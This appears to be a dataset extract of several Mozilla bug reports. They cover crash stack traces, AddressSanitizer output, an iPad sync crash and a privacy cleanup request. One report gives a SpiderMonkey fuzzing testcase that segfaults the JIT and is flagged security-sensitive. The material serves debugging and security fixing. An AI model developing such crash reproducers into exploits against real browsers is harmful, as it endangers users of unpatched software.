#21 0x085f8a49 in js::jit::Simulator::call (this=<optimized out>, entry=<optimized out>, argument_count=<optimized out>) at js/src/jit/arm/Simulator-arm.cpp:5074
#22 0x083cbdb0 in EnterJit (cx=<optimized out>, cx@entry=0xf6e1d800, state=..., code=0x21d21670 "\004\340-\345\a") at js/src/jit/Jit.cpp:101
#23 0x083ccaef in js::jit::MaybeEnterJit (cx=0xf6e1d800, state=...) at js/src/jit/Jit.cpp:163
#24 0x081e239f in js::RunScript (cx=<optimized out>, state=...) at js/src/vm/Interpreter.cpp:402
#25 0x081e4cd9 in js::ExecuteKernel (cx=<optimized out>, script=..., envChainArg=..., newTargetValue=..., evalInFrame=..., result=<optimized out>) at js/src/vm/Interpreter.cpp:700
#26 0x0821a61a in EvalKernel (cx=<optimized out>, v=..., v@entry=..., evalType=evalType@entry=DIRECT_EVAL, caller=..., env=..., pc=0xf57b4275 "{\001", vp=...) at js/src/builtin/Eval.cpp:323
#27 0x0821acc0 in js::DirectEval (cx=<optimized out>, v=..., vp=...) at js/src/builtin/Eval.cpp:433
#28 0x082be7ed in js::jit::DoCallFallback (cx=<optimized out>, frame=0xf5bffdd8, stub_=0xf6e89050, argc=1, vp=0xf5bffd98, res=...) at js/src/jit/BaselineIC.cpp:2364
#29 0x085f6410 in js::jit::Simulator::softwareInterrupt (this=0xf6e58000, instr=0xf6e78164) at js/src/jit/arm/Simulator-arm.cpp:2707
#30 0x085f6c16 in js::jit::Simulator::decodeType7 (this=0xf6e58000, instr=0xf6e78164) at js/src/jit/arm/Simulator-arm.cpp:3876
#31 0x085f4b02 in js::jit::Simulator::instructionDecode (this=0xf6e58000, instr=0xf6e78164) at js/src/jit/arm/Simulator-arm.cpp:4856
#32 0x085f882a in js::jit::Simulator::execute<false> (this=0xf6e58000) at js/src/jit/arm/Simulator-arm.cpp:4911
#33 js::jit::Simulator::callInternal (this=0xf6e58000, entry=0x20469800 "\360O-\351\004\320M\342\020\212-\355\r\200\240\341h\220\235\345\r\260\240\341t\240\235", <incomplete sequence \345>) at js/src/jit/arm/Simulator-arm.cpp:4991
#34 0x085f8a49 in js::jit::Simulator::call (this=<optimized out>, entry=<optimized out>, argument_count=<optimized out>) at js/src/jit/arm/Simulator-arm.cpp:5074
#35 0x083cbdb0 in EnterJit (cx=<optimized out>, cx@entry=0xf6e1d800, state=..., code=0x20479e00 "\004\340-\345\a") at js/src/jit/Jit.cpp:101
#36 0x083ccaef in js::jit::MaybeEnterJit (cx=0xf6e1d800, state=...) at js/src/jit/Jit.cpp:163
#37 0x081e239f in js::RunScript (cx=<optimized out>, state=...) at js/src/vm/Interpreter.cpp:402
#38 0x081e2a05 in js::InternalCallOrConstruct (cx=<optimized out>, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:489
#39 0x081e2cf0 in InternalCall (cx=cx@entry=0xf6e1d800, args=...) at js/src/vm/Interpreter.cpp:516
#40 0x081e2eaa in js::Call (cx=0xf6e1d800, fval=..., thisv=..., args=..., rval=...) at js/src/vm/Interpreter.cpp:535
#41 0x08638a89 in JS_CallFunction (cx=<optimized out>, obj=..., fun=..., args=..., rval=...) at js/src/jsapi.cpp:2948
#42 0x084c94d1 in OOMTest (cx=<optimized out>, argc=<optimized out>, vp=<optimized out>) at js/src/builtin/TestingFunctions.cpp:1721
[...]
#65 main (argc=<optimized out>, argv=<optimized out>, envp=<optimized out>) at js/src/shell/js.cpp:9234
eax 0x0 0
ebx 0xffff9c54 -25516
ecx 0xf7d9f864 -136710044
edx 0x0 0
esi 0xf3db3448 -203738040
edi 0xf3db3448 -203738040
ebp 0xffff9c88 4294941832
esp 0xffff9bf0 4294941680
eip 0x84897d1 <js::jit::MoveResolver::resolve()+2081>
=> 0x84897d1 <js::jit::MoveResolver::resolve()+2081>: movl $0x0,0x0
0x84897db <js::jit::MoveResolver::resolve()+2091>: ud2
|
|
1,457,301 | 13,236,744 |
This bug was filed from the Socorro interface and is
report bp-b9253079-c032-408e-906d-06d400180325.
=============================================================
Seen while looking at Mac specific nightly crashes - also affects Linux: https://bit.ly/2JvwxJD. Not super huge volume.
Crashes go back to Build 20180322100349.
Possible regression range based on build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=3d21d31141dc5e2d2aff89203458125a3cce6c64&tochange=8bf380faae74e4921be6000496ca09d4a2c44e8d
Top 10 frames of crashing thread:
0 libxul.so mozilla::ipc::ProcessLink::SendMessage ipc/glue/MessageLink.cpp:164
1 libxul.so mozilla::ipc::MessageChannel::Send [clone .cold.466]
2 libxul.so mozilla::dom::PBrowserChild::SendAsyncMessage ipc/ipdl/PBrowserChild.cpp:163
3 libxul.so mozilla::dom::TabChild::DoSendAsyncMessage dom/ipc/TabChild.cpp:3073
4 libxul.so nsFrameMessageManager::DispatchAsyncMessage
5 libxul.so mozilla::dom::ContentFrameMessageManagerBinding::sendAsyncMessage
6 libxul.so mozilla::dom::ContentFrameMessageManagerBinding::genericMethod
7 libxul.so js::InternalCallOrConstruct
8 libxul.so js::Call js/src/vm/Interpreter.cpp:535
9 libxul.so js::ForwardingProxyHandler::call const
=============================================================
|
|
1,457,758 | 13,240,359 |
This bug was filed from the Socorro interface and is
report bp-e68668ad-3457-4255-ad00-b07bd0180428.
=============================================================
This is topcrash 7 in the Windows nightly 20180426100055, with
21 crashes in around 15 different installations. The stacks are
pretty much useless (AFAICS) but perhaps the driver involved is
something we can block? Filing on that basis.
Top 6 frames of crashing thread:
0 nvd3dumx_cfg.dll nvd3dumx_cfg.dll@0x9d471c
1 nvd3dumx_cfg.dll nvd3dumx_cfg.dll@0xa9faaf
2 nvd3dumx_cfg.dll nvd3dumx_cfg.dll@0x9cf36c
3 nvd3dumx_cfg.dll nvd3dumx_cfg.dll@0xc29a65
4 nvd3dumx_cfg.dll nvd3dumx_cfg.dll@0xaa19ee
5 nvd3dumx_cfg.dll nvd3dumx_cfg.dll@0x9d4cff
=============================================================
|
|
1,461,324 | 13,275,639 |
The following testcase crashes on mozilla-central revision a7461494a7a0 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --without-intl-api --enable-optimize --target=i686-pc-linux-gnu, run with --fuzzing-safe --cpu-count=2 --baseline-eager):
oomTest(function() {
eval(`
try {
(function() {
for (a of [{}, { __iterator__: function() {} }])
for (b in a)
return {p:1, q:2, r:3, s:4, t:5};
})();
} catch(ex) {}
`);
});
Backtrace:
received signal SIGSEGV, Segmentation fault.
#0 0x080b4d8e in JS::Value::toObject (this=0xffff9fa8) at dist/include/js/Value.h:749
#1 0x08401bf1 in js::jit::ProcessTryNotesBaseline (pc=0xffff9f5c, rfe=0xffffa264, ei=..., frame=..., cx=<optimized out>) at js/src/jit/JitFrames.cpp:432
#2 js::jit::HandleExceptionBaseline (pc=<optimized out>, rfe=0xffffa264, frame=..., cx=<optimized out>) at js/src/jit/JitFrames.cpp:524
#3 js::jit::HandleException (rfe=<optimized out>) at js/src/jit/JitFrames.cpp:710
#4 0x230e9703 in ?? ()
#5 0x230dbb85 in ?? ()
#6 0x083f7c2d in EnterJit (cx=<optimized out>, cx@entry=0xf6e17800, state=..., code=0x23c81120 "\351\033") at js/src/jit/Jit.cpp:101
#7 0x083f887f in js::jit::MaybeEnterJit (cx=0xf6e17800, state=...) at js/src/jit/Jit.cpp:163
#8 0x081e456f in js::RunScript (cx=<optimized out>, state=...) at js/src/vm/Interpreter.cpp:402
#9 0x081e4bd5 in js::InternalCallOrConstruct (cx=<optimized out>, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:489
#10 0x081e4ec0 in InternalCall (cx=cx@entry=0xf6e17800, args=...) at js/src/vm/Interpreter.cpp:516
#11 0x081e503f in js::CallFromStack (cx=0xf6e17800, args=...) at js/src/vm/Interpreter.cpp:522
#12 0x082c3d24 in js::jit::DoCallFallback (cx=<optimized out>, frame=0xffffab08, stub_=0xf54f1010, argc=0, vp=0xffffaad0, res=...) at js/src/jit/BaselineIC.cpp:2382
#13 0x230e869a in ?? ()
#14 0xf54f1010 in ?? ()
#15 0x230dbb85 in ?? ()
#16 0x083f7c2d in EnterJit (cx=<optimized out>, cx@entry=0xf6e17800, state=..., code=0x23c80890 "\351\033") at js/src/jit/Jit.cpp:101
#17 0x083f887f in js::jit::MaybeEnterJit (cx=0xf6e17800, state=...) at js/src/jit/Jit.cpp:163
#18 0x081e456f in js::RunScript (cx=<optimized out>, state=...) at js/src/vm/Interpreter.cpp:402
#19 0x081e6ee9 in js::ExecuteKernel (cx=<optimized out>, script=..., envChainArg=..., newTargetValue=..., evalInFrame=..., result=<optimized out>) at js/src/vm/Interpreter.cpp:700
#20 0x0821d81a in EvalKernel (cx=<optimized out>, v=..., v@entry=..., evalType=evalType@entry=DIRECT_EVAL, caller=..., env=..., pc=0xf65b4275 "{\001", vp=...) at js/src/builtin/Eval.cpp:323
#21 0x0821dec0 in js::DirectEval (cx=<optimized out>, v=..., vp=...) at js/src/builtin/Eval.cpp:433
#22 0x082c436d in js::jit::DoCallFallback (cx=<optimized out>, frame=0xffffb778, stub_=0xf65c8050, argc=1, vp=0xffffb738, res=...) at js/src/jit/BaselineIC.cpp:2366
#23 0x230e869a in ?? ()
#24 0xf65c8050 in ?? ()
#25 0x230dbb85 in ?? ()
#26 0x083f7c2d in EnterJit (cx=<optimized out>, cx@entry=0xf6e17800, state=..., code=0x230fe760 "\351\033") at js/src/jit/Jit.cpp:101
[...]
#32 0x086816f2 in JS_CallFunction (cx=<optimized out>, obj=..., fun=..., args=..., rval=...) at js/src/jsapi.cpp:2948
#33 0x084fdaa1 in OOMTest (cx=<optimized out>, argc=<optimized out>, vp=<optimized out>) at js/src/builtin/TestingFunctions.cpp:1774
[...]
#38 0x082c3d24 in js::jit::DoCallFallback (cx=<optimized out>, frame=0xffffc2e8, stub_=0xf65b5030, argc=1, vp=0xffffc2a8, res=...) at js/src/jit/BaselineIC.cpp:2382
#39 0x230e869a in ?? ()
#40 0xf65b5030 in ?? ()
#41 0x230dbb85 in ?? ()
#42 0x083f7c2d in EnterJit (cx=<optimized out>, cx@entry=0xf6e17800, state=..., code=0x230ea200 "\351\033") at js/src/jit/Jit.cpp:101
[...]
#53 main (argc=<optimized out>, argv=<optimized out>, envp=<optimized out>) at js/src/shell/js.cpp:9294
eax 0x0 0
ebx 0x8ea4000 149569536
ecx 0xf7d9f864 -136710044
edx 0x0 0
esi 0x8ea4000 149569536
edi 0x8401ba2 138419106
ebp 0xffff9ed8 4294942424
esp 0xffff9ed0 4294942416
eip 0x80b4d8e <JS::Value::toObject() const+62>
=> 0x80b4d8e <JS::Value::toObject() const+62>: movl $0x0,0x0
0x80b4d98 <JS::Value::toObject() const+72>: ud2
Marking this s-s because it only reproduces on 32-bit, it requires JIT and we had vulnerabilities with the same assertion before.
|
|
1,461,731 | 13,279,146 |
This bug was filed from the Socorro interface and is
report bp-690da5e1-4448-44e9-8900-ef3db0180515.
=============================================================
Currently at the top of **Mac** crash stats in 60, although present in other versions as well: https://bit.ly/2KqQba0. All users on 60 are running 10.13.
Comments:
*Firefox gets stuck (and sometimes crashes) since installation of 60.0
*60 is very buggy on my iMac. Freezes constantly. I have to use Chrome
*no more network access (from firefox only). Safari is still ok.
MOZ_CRASH(Shutdown hanging before starting.) - Seems like a bad user experience.
Top 10 frames of crashing thread:
0 libsystem_kernel.dylib libsystem_kernel.dylib@0x1ca1e
1 libsystem_pthread.dylib _pthread_cond_wait
2 libsystem_pthread.dylib pthread_cond_signal_thread_np
3 libmozglue.dylib <name omitted> mozglue/misc/ConditionVariable_posix.cpp:118
4 XUL mozilla::ThreadEventQueue<mozilla::PrioritizedEventQueue<mozilla::EventQueue> >::GetEvent xpcom/threads/CondVar.h:68
5 XUL nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:967
6 XUL NS_ProcessNextEvent xpcom/threads/nsThreadUtils.cpp:517
7 XUL mozilla::net::nsHttpConnectionMgr::Shutdown xpcom/threads/nsThreadUtils.h:323
8 XUL mozilla::net::nsHttpHandler::Observe netwerk/protocol/http/nsHttpHandler.cpp:2754
9 XUL non-virtual thunk to mozilla::net::nsHttpHandler::Observe netwerk/protocol/http/nsHttpHandler.cpp
=============================================================
|
|
1,461,749 | 13,279,255 |
Created attachment 8975882
trigger.html
Testcase found while fuzzing mozilla-central rev cf3ee14023483cbbb57129479537c713e22c1980.
==10111==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000001c (pc 0x7f2c228f7856 bp 0x7ffdaea40050 sp 0x7ffdaea40040 T0)
==10111==The signal is caused by a READ memory access.
==10111==Hint: address points to the zero page.
#0 0x7f2c228f7855 in GetBoolFlag /builds/worker/workspace/build/src/dom/base/nsINode.h:1644:12
#1 0x7f2c228f7855 in GetParent /builds/worker/workspace/build/src/dom/base/nsINode.h:999
#2 0x7f2c228f7855 in mozilla::dom::ExplicitChildIterator::Seek(nsIContent const*) /builds/worker/workspace/build/src/dom/base/ChildIterator.cpp:177
#3 0x7f2c2795d231 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7152:10
#4 0x7f2c278eddaf in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1402:27
#5 0x7f2c278fb105 in mozilla::RestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:3001:9
#6 0x7f2c278b2e1d in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:3078:3
#7 0x7f2c278b2e1d in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4315
#8 0x7f2c27842f76 in FlushPendingNotifications /builds/worker/workspace/build/src/layout/base/nsIPresShell.h:591:5
#9 0x7f2c27842f76 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1925
#10 0x7f2c27852380 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:337:13
#11 0x7f2c27852380 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:307
#12 0x7f2c27851f46 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:329:5
#13 0x7f2c27854cbe in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:770:5
#14 0x7f2c27854cbe in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:683
#15 0x7f2c278548be in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:584:9
#16 0x7f2c280fabff in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
#17 0x7f2c20e82a6d in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:167:20
#18 0x7f2c20d46e2d in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1988:28
#19 0x7f2c2085ffce in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2136:25
#20 0x7f2c2085cf96 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2066:17
#21 0x7f2c2085e74c in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1912:5
#22 0x7f2c2085eda8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1945:15
#23 0x7f2c1f96dba3 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1090:14
#24 0x7f2c1f989770 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
#25 0x7f2c20867c6a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#26 0x7f2c207bb959 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#27 0x7f2c207bb959 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#28 0x7f2c207bb959 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#29 0x7f2c272f5d5a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
#30 0x7f2c2b55d49b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
#31 0x7f2c207bb959 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#32 0x7f2c207bb959 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#33 0x7f2c207bb959 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#34 0x7f2c2b55ce60 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
#35 0x4f50dc in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
#36 0x4f50dc in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282
#37 0x7f2c3f5f582f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
|
|
1,461,953 | 13,281,264 |
Created attachment 8976106
Client-2018-05-16-152159.ips.beta
Device: iPad Mini 4 iOS 11.4 (15F5077a)
Build: 12.0 (10645)
Steps to reproduce:
1. Launch Firefox
2. Login with any account
3. From the hamburger menu select the sync button (username)
4. From the account management page, tap the "Disconnect Sync" and "Disconnect" button
Expected results:
Account is disconnected, "Disconnect sync" option no longer available
Actual results:
Account is disconnected, "Disconnect sync" still available and if pressed, Firefox crashes
Note: Occurs only on iPad devices.
|
|
1,462,077 | 13,282,326 |
It appears we are hitting our safety release assert in FF60 that prevents a cross-origin service worker controller. Fortunately the assertion prevents this from being a security issue, but its a bad problem and we need to figure out how this is happening.
This bug was filed from the Socorro interface and is
report bp-09d62ec8-7bf4-4e50-b863-aa3bd0180516.
=============================================================
Top 10 frames of crashing thread:
0 xul.dll mozilla::dom::ClientSource::SetController dom/clients/manager/ClientSource.cpp:383
1 xul.dll mozilla::dom::ClientSource::Control dom/clients/manager/ClientSource.cpp:433
2 xul.dll mozilla::dom::ClientSourceOpChild::DoSourceOp<RefPtr<mozilla::MozPromise<mozilla::dom::ClientOpResult, nsresult, 0> > dom/clients/manager/ClientSourceOpChild.cpp:45
3 xul.dll mozilla::dom::ClientSourceOpChild::Init dom/clients/manager/ClientSourceOpChild.cpp:79
4 xul.dll mozilla::dom::ClientSourceChild::RecvPClientSourceOpConstructor dom/clients/manager/ClientSourceChild.cpp:49
5 xul.dll mozilla::dom::PClientSourceChild::OnMessageReceived ipc/ipdl/PClientSourceChild.cpp:241
6 xul.dll mozilla::ipc::PBackgroundChild::OnMessageReceived ipc/ipdl/PBackgroundChild.cpp:1968
7 xul.dll mozilla::ipc::MessageChannel::DispatchAsyncMessage ipc/glue/MessageChannel.cpp:2133
8 xul.dll mozilla::ipc::MessageChannel::DispatchMessageW ipc/glue/MessageChannel.cpp:2063
9 xul.dll mozilla::ipc::MessageChannel::RunMessage ipc/glue/MessageChannel.cpp:1909
=============================================================
|
|
1,462,662 | 13,287,333 |
+++ This bug was initially created as a clone of Bug #1457929 +++
As discussed in Bug 1457929 - we should clear out the container used by privacy.usercontext.about_newtab_segregation.enabled (which I believe is '5') so we don't make a persistent container that tracks the user through thumbnails.
:baku proposed doing it on shutdown (and startup in case of crash.)
|
|
1,462,746 | 13,288,033 |
This bug was filed from the Socorro interface and is
report bp-952bf2b4-d13d-43c1-9071-e51e60180514.
=============================================================
Seen while looking at Mac crash stats: https://bit.ly/2KA0vwo. 11 crashes/9 installs on Mac in the last 7 days. Crashes seemed to have started with Build 20180512220039
Possible regression range based on Build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=aabfe960ab59fea2e85896b1f8050786e16ab23b&tochange=a7461494a7a0bb3d80c1449c1d5d484d8b568d98
Top 10 frames of crashing thread:
0 XUL mozilla::ShouldClearTargets dom/base/nsWrapperCache.h:264
1 XUL mozilla::EventDispatcher::Dispatch dom/events/EventDispatcher.cpp:955
2 XUL mozilla::EventDispatcher::DispatchDOMEvent dom/events/EventDispatcher.cpp
3 XUL nsINode::DispatchEvent dom/base/nsINode.cpp:1079
4 XUL nsContentUtils::DispatchEvent dom/base/nsContentUtils.cpp:4471
5 XUL nsContentUtils::DispatchTrustedEvent dom/base/nsContentUtils.cpp:4439
6 XUL mozilla::dom::HTMLSlotElement::FireSlotChangeEvent dom/html/HTMLSlotElement.cpp:241
7 XUL nsDOMMutationObserver::HandleMutationsInternal dom/base/nsDOMMutationObserver.cpp:949
8 XUL mozilla::CycleCollectedJSContext::PerformMicroTaskCheckPoint xpcom/base/CycleCollectedJSContext.cpp:543
9 XUL mozilla::CycleCollectedJSContext::AfterProcessTask xpcom/base/CycleCollectedJSContext.cpp:374
=============================================================
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.